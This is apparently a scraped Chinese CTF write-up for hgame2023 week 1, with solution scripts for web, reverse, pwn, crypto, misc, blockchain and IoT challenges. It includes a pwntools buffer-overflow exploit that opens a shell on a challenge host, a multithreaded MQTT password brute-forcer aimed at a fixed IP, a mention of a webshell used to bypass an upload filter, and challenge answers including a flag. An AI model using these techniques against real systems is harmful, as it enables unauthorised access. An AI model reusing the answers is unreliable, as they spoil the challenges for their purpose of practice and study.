hgame2023-week1

hgame2023-week1

该说不说ctf圈越来越卷 去年感觉题还没这么难
有一说一 出题人真的很用心 部分题很新

Web

Classic Childhood Game

翻代码,翻到个奇怪的变量 当时属于一眼顶针了
撇cyberchef from hex 加俩次base64 直接出

Become A Member

去年有个类似的题 好像是送豆腐
在这里插入图片描述

Guess Who I Am

不想分析流程 直接selenium
虽然有点慢吧

from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import timename = ["ba1van4","yolande","t0hka","h4kuy4","kabuto","R1esbyfe","tr0uble","Roam","Potat0","Summer","chuj","4nsw3r","4ctue","0wl","At0m","ChenMoFeiJin","Klrin","ek1ng","latt1ce","Ac4ae0","Akira","qz","Liki4","0x4qE","xi4oyu","R3n0","m140","Mezone","d1gg12","Trotsky","Gamison","Tinmix","RT","wenzhuan","Cosmos","Y","Annevi","logong","Kevin","LurkNoi","幼稚园","lostflower","Roc826","Seadom","ObjectNotFound","Moesang","E99p1ant","Michael","matrixtang","r4u","357","Li4n0","迟原静","Ch1p","f1rry","mian","ACce1er4t0r","MiGo","BrownFly","Aris","hsiaoxychen","Lou00","Junier","bigmud","NeverMoes","Sora","fantasyqt","vvv_347","veritas501","LuckyCat","Ash","Cyris","Acaleph","b0lv42","ngc7293","ckj123","cru5h","xiaoyao52110","Undefinedv","Spine","Tata","Airbasic","jibo","Processor","HeartSky","Minygd","Yotubird","c014","Explorer","Aklis","Sysorem","Hcamael","LoRexxar","A1ex","Ahlaman","lightless","Edward_L","逆风","陈斩仙","Eric"]
des = ["21级 / 不会Re / 不会美工 / 活在梦里 / 喜欢做不会的事情 / ◼◻粉","21级 / 非常菜的密码手 / 很懒的摸鱼爱好者,有点呆,想学点别的但是一直开摆","21级 / 日常自闭的Re手","21级 / 菜鸡pwn手 / 又菜又爱摆","21级web / cat../../../../f*","21级 / 爱好歪脖 / 究极咸鱼一条 / 热爱幻想 / 喜欢窥屏水群","21级 / 喜欢肝原神的密码手","21级 / 入门级crypto","20级 / 摆烂网管 / DN42爱好者","20级 / 歪脖手 / 想学运维 / 发呆业务爱好者","20级 / 已退休不再参与大多数赛事 / 不好好学习,生活中就会多出许多魔法和奇迹","20级会长 / re / 不会pwn","20级 / 可能是IOT的MISC手 / 可能是美工 / 废物晚期","20级 / Re手 / 菜","20级 / web / 想学iot","20级 / Crypto / 摸鱼学代师","20级 / WEB / 菜的抠脚 / 想学GO","20级 / Web / 还在努力","20级 / Crypto&BlockChain / Plz V me 50 eth","*级 / 被拐卖来接盘的格子 / 不可以乱涂乱画哦","19级 / 不会web / 半吊子运维 / 今天您漏油了吗","19级 / 摸鱼美工 / 学习图形学、渲染ing","19级 / 脖子笔直歪脖手","19级 / &lt;/p&gt;&lt;p&gt;Web","19级 / 骨瘦如柴的胖手","19级 / bin底层选手","19级 / 不会re / dl萌新 / 太弱小了,没有力量 / 想学游戏","19级 / 普通的binary爱好者。","19级 / 游戏开发 / 🐟粉","19级 / 半个全栈 / 安卓摸🐟 / P 社玩家 / 🍆粉","19级 / 挖坑不填的web选手","19级会长 / DL爱好者 / web苦手","19级 / Re手,我手呢?","18 级 / 完全不会安全 / 一个做设计的鸽子美工 / 天天画表情包","18级 / 莫得灵魂的开发 / 茄粉 / 作豚 / 米厨","18 级 / Bin / Win / 电竞缺乏视力 / 开发太菜 / 只会 C / CSGO 白给选手","18级 / 会点开发的退休web手 / 想学挖洞 / 混吃等死","18 级 / 求大佬带我IoT入门 / web太难了只能做做misc维持生计 / 摸🐟","18 级 / Web / 车万","18级 / 会一丢丢crypto / 摸鱼","18级会长 / 二进制安全 / 干拉","18级 / 游戏引擎开发 / 尚有梦想的game maker","18 级 / Web 底层选手","18 级 / Web / 真·菜到超乎想象 / 拼死学(mo)习(yu)中","18级 / 懂点Web & Misc / 懂点运维 / 正在懂游戏引擎 / 我们联合!","18 级 / 不擅长 Web / 擅长摸鱼 / 摸鱼!","18级 / 囊地鼠饲养员 / 写了一个叫 Cardinal 的平台","18 级 / Java / 会除我佬","18级 / 编译器工程师( 伪 / 半吊子PL- 静态分析方向","18级 / 不可以摸🐠哦","18级 / 并不会web / 端茶送水选手","17 级 / Web 安全爱好者 / 半个程序员 / 没有女朋友","17级 / Focus on Java Security","17 级 / 自称 Bin 手实际啥都不会 / 二次元安全","17 级 / Web","17 级 / 业余开发 / 专业摸鱼","17级 / 摸鱼ctfer / 依旧在尝试入门bin / 菜鸡研究生+1","17级 / 二战人 / 老二次元 / 兴趣驱动生活","17级 / RedTeamer / 字节跳动安全工程师","17级/ Key厨 / 腾讯玄武倒水的","17级 / 游戏厂打工仔 / 来深圳找我快活","17级 / web / 东南读研","16 级 / 立志学术的统计er / R / 为楼上的脱单事业做出了贡献","16 级会长 / Web 后端 / 会一点点 Web 安全 / 会一丢丢二进制","16 级 / Java 福娃 / 上班 996 / 下班 669","16 级 / Web Developer","16 级 / 可能会运维 / 摸鱼选手","16 级 / Rev / Windows / Freelancer","16 级 / Bin / 被迫研狗","16 级 / Web 🐱 / 现于长亭科技实习","16 级 / Java 开发攻城狮 / 996 选手 / 濒临猝死","16 级 / Web 前端 / 美工 / 阿里云搬砖","16 级 / Web 前端 / 水母一小只 / 程序员鼓励师 / Cy 来组饥荒!","16级 / 大果子 / 毕业1年仍在寻找vidar娘接盘侠","16 级 / 蟒蛇饲养员 / 高数小王子","16 级 / Web / 菜鸡第一人","16级 / 前web手、现pwn手 / 菜鸡研究生 / scu","16 级 / Bin 打杂 / 他们说菜都是假的,我是真的","15 级网安协会会长 / Web 安全","逆向 / 二进制安全","二进制 CGC 入门水准 / 半吊子爬虫与反爬虫","Web 安全 / 长亭科技安服部门 / TSRC 2015 年年度英雄榜第八、2016 年年度英雄榜第十三","15 级 / 什么都不会的开发 / 打什么都菜","15 级 Vidar 会长 / 送分型逆向选手 / 13 段剑纯 / 差点没毕业 / 阿斯巴甜有点甜","15 级 / 挖不到洞 / 打不动 CTF / 内网渗透不了 / 工具写不出","15 级 / 删库跑路熟练工 / 没事儿拍个照 / 企鹅","15 级 / 已入 Python 神教","15 级 / Web 🐶 / 汪汪汪","14 级 HDUISA 会长 / 二进制安全 / 曾被 NULL、TD、蓝莲花等拉去凑人数 / 差点没毕业 / 长亭安研","14 级 HDUISA 副会长 / 二次元 / 拼多多安全工程师","14 级网安协会会长 / HDUISA 成员 / Web 安全 / Freebuf 安全社区特约作者 / FSI2015Freebuf 特邀嘉宾","13 级 / 知道创宇 404 安全研究员 / 现在 Nu1L 划划水 / IoT、Web、二进制漏洞,密码学,区块链都看得懂一点,但啥也不会","14 级 / Web 🐶 / 杭电江流儿 / 自走棋主教守门员","14 级网安协会副会长 / Web 安全","14 级网安协会副会长 / 无线安全","Web 安全 / 安全工程师 / 半吊子开发 / 半吊子安全研究","13 级 HDUISA 会长 / Web 安全 / 华为安全部门 / 二进制安全,fuzz,符号执行方向研究","13 级菜鸡 / 大数据打杂","什么都不会 / 咸鱼研究生 / <del>安恒</del>、<del>长亭</del> / SJTU","渗透 / 人工智能 / 北师大博士在读"]dic = {}
for i in range(len(name)):dic.update({des[i]:name[i]})def clean_with_send(element, text: str):"""清空输入框并且输入内容:param element: 需要操作的元素:param text: 输入的内容"""# 发送全选快捷键element.send_keys(Keys.CONTROL, "a")element.send_keys(text)option = webdriver.ChromeOptions()
option.add_experimental_option("detach", True)
driver = webdriver.Chrome(chrome_options=option)driver.get("http://week-1.hgame.lwsec.cn:30577/")
#刷新页面
driver.refresh()for i in range(100):time.sleep(1)a = driver.find_element_by_xpath('/html/body/div/div[2]/h2[1]').text[25:]b = driver.find_element_by_xpath("/html/body/div/div[2]/div/div/div[1]/div/input")clean_with_send(b, dic[a])driver.find_element_by_xpath("//*[@id=\"app\"]/div[2]/div/button/span").click()time.sleep(0.3)driver.switch_to.alert.accept()
time.sleep(1000)

Show Me Your Beauty

大小写绕过
蚁剑一直卡GitHub 后来干脆放弃
把hvv的冰蝎子拿出来用了

Reverse

test your IDA

撇ida直接就看到了

easyasm

chatgpt直接出
异或0x33

easyenc

高四位 低四位

#include <iostream>int main() {unsigned int dword_403000[100] = {0x00000008, 0x00000006, 0x00000007, 0x00000006, 0x00000001, 0x00000006, 0x0000000D, 0x00000006,0x00000005, 0x00000006, 0x0000000B, 0x00000007, 0x00000005, 0x00000006, 0x0000000E, 0x00000006,0x00000003, 0x00000006, 0x0000000F, 0x00000006, 0x00000004, 0x00000006, 0x00000005, 0x00000006,0x0000000F, 0x00000005, 0x00000009, 0x00000006, 0x00000003, 0x00000007, 0x0000000F, 0x00000005,0x00000005, 0x00000006, 0x00000001, 0x00000006, 0x00000003, 0x00000007, 0x00000009, 0x00000007,0x0000000F, 0x00000005, 0x00000006, 0x00000006, 0x0000000F, 0x00000006, 0x00000002, 0x00000007,0x0000000F, 0x00000005, 0x00000001, 0x00000006, 0x0000000F, 0x00000005, 0x00000002, 0x00000007,0x00000005, 0x00000006, 0x00000006, 0x00000007, 0x00000005, 0x00000006, 0x00000002, 0x00000007,0x00000003, 0x00000007, 0x00000005, 0x00000006, 0x0000000F, 0x00000005, 0x00000005, 0x00000006,0x0000000E, 0x00000006, 0x00000007, 0x00000006, 0x00000009, 0x00000006, 0x0000000E, 0x00000006,0x00000005, 0x00000006, 0x00000005, 0x00000006, 0x00000002, 0x00000007, 0x0000000D, 0x00000007,0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,0x00000000, 0x00000000, 0x00000000, 0x00000000};char flag[50];
//    for ( i = 0; i < 50; ++i )
//    {
//        v4[2 * i] = input[i] & 0xF;
//        v4[2 * i + 1] = (input[i] >> 4) & 0xF;
//    }for (int i = 0; i < 50; ++i) {flag[i] = dword_403000[2*i+1];flag[i] = flag[i] << 4;flag[i] = flag[i] + dword_403000[2*i];}std::cout << flag << std::endl;return 0;
}

a_cup_of_tea

注意sum一直是负的就行

#include <iostream>unsigned int k[4] = {0x12345678, 0x23456789, 0x34567890, 0x45678901};void decrypt(unsigned int *v)
{unsigned int v0 = v[0], v1 = v[1];unsigned int delta = 1412567261;unsigned int sum = - delta << 5;unsigned int k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];for (int i = 0; i < 32; i++){v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);sum += delta;}v[0] = v0;v[1] = v1;
}int main() {char Buf2[40];*(int *)Buf2 = 778273437;*(int *)&Buf2[4] = 3243130895;*(int *)&Buf2[8] = -1690714183;*(int *)&Buf2[12] = 1512016660;*(int *)&Buf2[16] = 1636330974;*(int *)&Buf2[20] = 1701168847;*(int *)&Buf2[24] = -1626976412;*(int *)&Buf2[28] = 594166774;*(int *)&Buf2[32] = 32107;for (int i = 0; i < 4; ++i) {decrypt((unsigned int *)&Buf2[i*8]);}std::cout << Buf2 << std::endl;}

encode

#include <stdio.h>
int main() {char v7[41];*(int *) v7 = 167640836;*(int *) &v7[4] = 11596545;*(int *) &v7[8] = -1376779008;*(int *) &v7[12] = 85394951;*(int *) &v7[16] = 402462699;*(int *) &v7[20] = 32375274;*(int *) &v7[24] = -100290070;*(int *) &v7[28] = -1407778552;*(int *) &v7[32] = -34995732;*(int *) &v7[36] = 101123568;v7[40] = -7;char flag[41];
//    while (1) {
//        v5 = (input[i] ^ 0x32) - 86;
//        input[i] = v5;
//        if (v7[i] != v5)
//            break;
//        if (++i >= 41) {
//            win32_printf("you are right!");
//            return 0;
//        }
//    }for (int i = 0; i <= 41; ++i) {flag[i] = (v7[i] + 86) ^ 0x32;}printf("%s", flag);
}

Pwn

是fw 就会两个题

test_nc

直接连 连就是shell

easy_overflow

简单的栈溢出 有后门函数
懒得算了 直接gdb peda出offset=16

from pwn import *
context.log_level="debug"# p=process("./vuln")
p = remote("week-1.hgame.lwsec.cn", 30336)
payload=b"a"*(16+8)+p64(0x401176)
p.send(payload)
p.interactive()

没输出???
翻一下代码 发现输出被关闭了
exec 1>&0 重定位一下就行了

Crypto

RSA

在这里插入图片描述

Be Stream

chatgpt直出 但慢
优化一下 打个表

key = [int.from_bytes(b"Be water", 'big'), int.from_bytes(b"my friend", 'big')]
enc = b'\x1a\x15\x05\t\x17\t\xf5\xa2-\x06\xec\xed\x01-\xc7\xcc2\x1eXA\x1c\x157[\x06\x13/!-\x0b\xd4\x91-\x06\x8b\xd4-\x1e+*\x15-pm\x1f\x17\x1bY'def printFlag():flag = ""for i in range(len(enc)):try:water = key_[(i//2)**6] % 256temp = water ^ enc[i]flag += chr(temp)print(flag)except:print("error")breakkey_ = [key[0], key[1]]
for i in range(2, 500000000):temp = (key_[i-2]*7+key_[i-1]*4) % 256key_.append(temp)if i%100000000 == 0:printFlag()

神秘的电话

手机听出morse

0223E_PRIIBLY__HONWA_JMGH_FGKCQAOQTMFR

hint

几个星期前,我们收到一个神秘的消息。但是这个消息被重重加密,我们不知道它的真正含义是什么。唯一知道的信息是关于密钥的:“只有倒着翻过十八层的篱笆才能抵达北欧神话的终点”。

逆序 栅栏18
神话???
还是北欧???
Vidar!!!
维吉尼亚加密 密码就是Vidar

hgame{welcome_to_hgame2023_and_enjoy_hacking}

兔兔的车票

16张图片,3*5+1,一张flag,剩下的就是三组密钥图片,我们可以提取每张图片的像素然后对比是不是相同,得到大概的加密图片像素分布,最后再还原flag.png。
也是爆破了属于是 我写的跟狗屎一样 脚本就贴个最后还原的吧

from PIL import Imagewidth = 379
height = 234
img = Image.new('RGB',(width,height))
data1 = open("flag.txt","r").read()
data2 = open("out.txt","r").read()
data1 = data1.replace(", "," ").replace("(","").replace(")","").replace("[","").replace("]","").split(" ")
data1 = [int(x) for x in data1]
data2 = data2.replace(", "," ").replace("(","").replace(")","").replace("[","").replace("]","").split(" ")
data2 = [int(x) for x in data2]
r = []
g = []
b = []
print(data1)for i in range(0,len(data1),3):r.append(data1[i]^data2[i])g.append(data1[i+1]^data2[i+1])b.append(data1[i+2]^data2[i+2])
index = 0
for i in range(height):for j in range(width):img.putpixel((j, i),(r[index],g[index],b[index]))index = index + 1
img.save("flag.png")

Misc

Sign In

base64解密

Where am I

wireshark流量导出
010 改下文件头
再将密码位改成0
在这里插入图片描述
解压就看见图片了
图片详细信息里有拍摄坐标
记得四舍五入!!!

神秘的海报

lsb 前半段flag + wav
提示steghide 6位数字密码 爆破
在这里插入图片描述
后半段flag就出来了

e99p1ant_want_girlfriend

crc校验出错
改高度 直接出

BlockChain

Checkin

remin 不让用
两个号打水
先部署再调用就完了

import json
from eth_account import Account
from web3 import Web3
import timecontractAddress = "" # 合约地址
private_key = "" # 私钥web3 = Web3(Web3.HTTPProvider('http://week-1.hgame.lwsec.cn:31342/'))connected = web3.isConnected()  # 检查是否连接成功
print(connected)# 使用私钥将账户实例化
# account = Account.from_key(private_key)#导入智能合约,并实例化
with open('contract_checkin_sol_Checkin.abi') as f:abi = json.load(f)
contract = web3.eth.contract(address=contractAddress,abi=abi)tx = contract.functions.setGreeting("HelloHGAME!").buildTransaction({'gas': 1000000,'gasPrice': web3.toWei('100', 'gwei'), 'from': account.address,'nonce': web3.eth.getTransactionCount(account.address)
}) # 花钱就要交易 因此创建交易 下面就是交易步骤signed = account.signTransaction(tx) # 用账户对交易签名	
tx_id = web3.eth.sendRawTransaction(signed.rawTransaction) # 交易打包发送print(tx_id) # 打印交易IDtime.sleep(30) # 等待交易确认print(contract.functions.isSolved().call()) #不要钱 直接调用

IoT

Help marvin

pulseview
使用spi decoder
D0 肯定是时钟信号 要不不够长
cs# (ss) 空着就行
在这里插入图片描述
解出hex
用cyberchef from hex to binary
从开头删 删一个 就出来了
(为什么这么做 看图 想一想就明白了

Help the uncle who can’t jump twice

给密码本了 开多线程爆破就完了 (运维大大 别喷我

from paho.mqtt import client as mqtt_client
from concurrent.futures import ThreadPoolExecutor# 与小节3一直,都是连接到Borker
def connect_mqtt(password):def on_connect(client, userdata, flags, rc):if rc == 0:print(password+" Connected to MQTT Broker!")client = mqtt_client.Client('python-mqtt-'+password)    # 生成一个设备号client.username_pw_set("Vergil", password)  # 与Publish一样client.on_connect = on_connectclient.connect('117.50.177.240', 1883)client.loop_forever()client.disconnect()def main():f = open("password.txt", "r")passwords = f.read()passwords = passwords.split("\n")pool = ThreadPoolExecutor(max_workers=500)for password in passwords:pool.submit(connect_mqtt, password)pool.shutdown(wait=True)if __name__ == '__main__':main()

mqttx 进入 订阅Nero/YAMATO就行

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/16447.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

hgame2022-week1

目录 web Classic Childhood Game Become A Member Show Me Your Beauty Guess Who I Am crypto RSA 神秘的电话 misc e99p1ant_want_girlfriend Sign In 神秘的海报 Where am I Reverse test your IDA easyasm Pwn test_nc web Classic Childhood Game 游戏…

嘉宾阵容公布,开源社邀请您参加 Impact Tech, She Can 2023

2023 年&#xff0c;在三八妇女节来临之际&#xff0c;Jina AI 联合将门创投、OpenMMLab、亚马逊云科技、稀土掘金、开源中国、CSDN等 14 家科技行业伙伴&#xff0c;发起了第二届「Impact Tech, She Can」线上对话。 、 活动信息 通过 2 场圆桌对话、1 场技术分享&#xff0c;…

在线环境 - 免费的文生图接口部署(实现文本到图像生成)

地址Text-to-Image Synthesishttps://project-iprj64b657264549ab788a4e41d1-8000.preview.node01.inscode.run/声明 正在尝试更换其他模型&#xff0c;基于达摩院通义文生图大模型ai_artist目前在效果上有待优化&#xff0c;先下线&#xff0c;后面升级再上。 前言 "文生…

VALSE 2023 无锡线下参会个人总结 6月11日-2

VALSE 2023 无锡线下参会个人总结 6月11日-2 6月11日会议日程安排Workshop&#xff1a;目标检测与分割程明明&#xff1a;粒度自适应的图像感知技术张兆翔&#xff1a;基于多传感器融合的视觉物体检测与分割 Workshop&#xff1a;ChatGPT与计算机视觉白翔&#xff1a;再谈ChatG…

人脸属性分析--性别、年龄和表情识别

人脸属性指的是根据给定的人脸判断其性别、年龄和表情等&#xff0c;当前在github上开源了一些相关的工作&#xff0c;大部分都是基于tensorflow的&#xff0c;还有一部分是keras&#xff0c;CVPR2015曾有一篇是用caffe做的. CSDN 从0到1实现基于Tornado和Tensorflow的人脸、…

诸葛智能CTO文革:以自助式数据分析,帮助企业释放业务价值丨数据猿专访

‍数据智能产业创新服务媒体 ——聚焦数智 改变商业 进入数字经济时代&#xff0c;无论是数字产业化还是产业数字化的推进&#xff0c;数据分析都是整个链条的关键环节。尤其是在各个行业的数字化转型升级过程中&#xff0c;以数据分析释放业务价值&#xff0c;扮演至关重要的…

python详解(5)——类,类,还是类

目录 &#x1f3c6;一、前言 &#x1f3c6;二、类 &#x1f6a9;1、面向对象到底是什么 &#x1f6a9;2、数据成员and访问&#xff0c;汉堡店大升级&#xff08;超难&#xff09; &#x1f44d;①、类变量&#xff08;超难&#xff09; &#x1f44d;②、实例变量 &#x1f6a9…

数字孪生“独木难支”产业元宇宙

ChatGPT的耀眼光环下&#xff0c;还有多少人记得大明湖畔的“元宇宙”呢&#xff1f;科技圈凉薄如斯啊&#xff01; 元宇宙概念大火之后&#xff0c;很快出现了各种“XX元宇宙”的产业级解决方案。 工业元宇宙&#xff0c;构建智能数字孪生体&#xff0c;实现生产运行可视化、数…

【探索 Kubernetes|作业管理篇 系列 7】探究 Pod 有什么用,为什么需要它

前言 大家好&#xff0c;我是秋意零。 前一篇&#xff0c;我们介绍了如何从 0 到 1 搭建 Kubernetes 集群。现在我们可以正式了解&#xff0c;Kubernetes 核心特征了。 今天我们来探究 Pod&#xff0c;为什么需要 Pod&#xff1f; &#x1f47f; 简介 &#x1f3e0; 个人主页…

从零开始的steam独立游戏独自一人的开发生活

从零开始的steam游戏开发日志&#xff08;鼓励自己不停更&#xff09; 自己一个人做游戏自己做策划、美术、程序&#xff0c;会把一些涉及到的关键技术发到CSDN作为自己的博客记录&#xff0c;也算是一些积累&#xff0c;鼓励自己不停更。PS&#xff1a;自己一个人搞开发真的很…

语音合成概述

一、语音合成概述 语音合成&#xff0c;又称文语转换(Text To Speech, TTS)&#xff0c;是一种可以将任意输入文本转换成相应语音的技术。 传统的语音合成系统通常包括前端和后端两个模块。前端模块主要是对输入文本进行分析&#xff0c;提取后端模块所需要的语言学信息&…

TTS | 语音合成常见数据集及数据格式详情

link 本文主要是介绍了语音合成中最常见的数据集&#xff08;包含各个语种&#xff09;&#xff0c;及其格式等 外语数据集 1.LJSpeech 网址 &#xff1a; The LJ Speech Dataset (keithito.com) 数据集描述&#xff1a; 数据集大小&#xff1a;2.6GB 这是一个公共领域的语音数…

语音合成技术入门之Tacotron

语音合成TTS 学习李宏毅课程。 输入文字&#xff0c;输出语音。 端到端之前TTS 18世纪就有&#xff0c;能找到demo的是1939年VODER。 就像电子琴一样&#xff0c;用手控制发出不同声音。 到1960年&#xff0c;IBM计算机能合成出歌唱声。 波形拼接 过去最常用的商用语音合…

语音合成技术

关注52AI&#xff0c;做AI的行业领先者。QQ人工智能行业交流群&#xff1a;626784247. 01 本期分享的主题是语音合成技术&#xff0c;以下是本次分享的主要内容&#xff1a; 1.语音合成技术简介 1.1 什么是语音合成&#xff1f; 语音合成技术是将任意文本转换成语音的技术。是人…

语音合成技术简介

文章目录 前言一、传统语音合成系统1. 总体框架2. 基于统计参数的语音合成2.1 系统流程图2.2 模型算法 二、端到端的合成语音系统1. 总体框架2. 基于深度学习的语音合成2.1 系统流程图2.2 特征网络模型算法1. Tacotron2. DeepVoice3. DeepVoice24. DeepVoice3 & Tacotron25…

语音合成 - TTS gTTS

目录 1. 简单介绍 2. 代码示例 1. 简单介绍 https://gtts.readthedocs.io/en/latest/https://gtts.readthedocs.io/en/latest/ gTTS 是基于 Python 的文本转语音库&#xff0c;用于语音合成。 2. 代码示例 安装&#xff1a; pip install gTTS Python: from gtts import…

在线语音合成工具代码

语音合成软件语音合成助手免费版下载语音合成助手语音合成技术语音合成器语音合成工具下载语音合成软件哪个好用语音合成软件免费版语音合成网易有道智云语音合成网站 <div class"container mx-auto" id"app"><div class"card lg:card-side …

VITS 语音合成完全端到端TTS的里程碑

Conditional Variational Autoencoder with Adversarial Learning for End-to-End Text-to-Speech&#xff08;ICML 2021&#xff09; KAKAO公司与KAIST韩国科学院&#xff0c;近年在TTS领域佳作频出&#xff0c;目前最主流的HiFiGAN声码器也是其成果。 目录 概览&#xff1…

MS-TTS:免费微软TTS语音合成工具(一键合成导出MP3音频)

声明 本工具是个免费工具&#xff0c;遇到问题&#xff0c;还请自行解决&#xff0c;下面有文字教程&#xff0c;B站有视频教程&#xff08;链接在文章末尾&#xff09;&#xff1b; 其次&#xff0c;微软接口卡顿&#xff0c;连接超时等问题下方有详细说明&#xff0c;请仔细…

某团mtgsig逆向学习

声明&#xff1a;本文仅限学习交流使用&#xff0c;禁止用于非法用途、商业活动等。否则后果自负。如有侵权&#xff0c;请告知删除&#xff0c;谢谢&#xff01;本教程也没有专门针对某个网站而编写&#xff0c;单纯的技术研究 目录 案例分析参数分析效果展示 案例分析 目标案…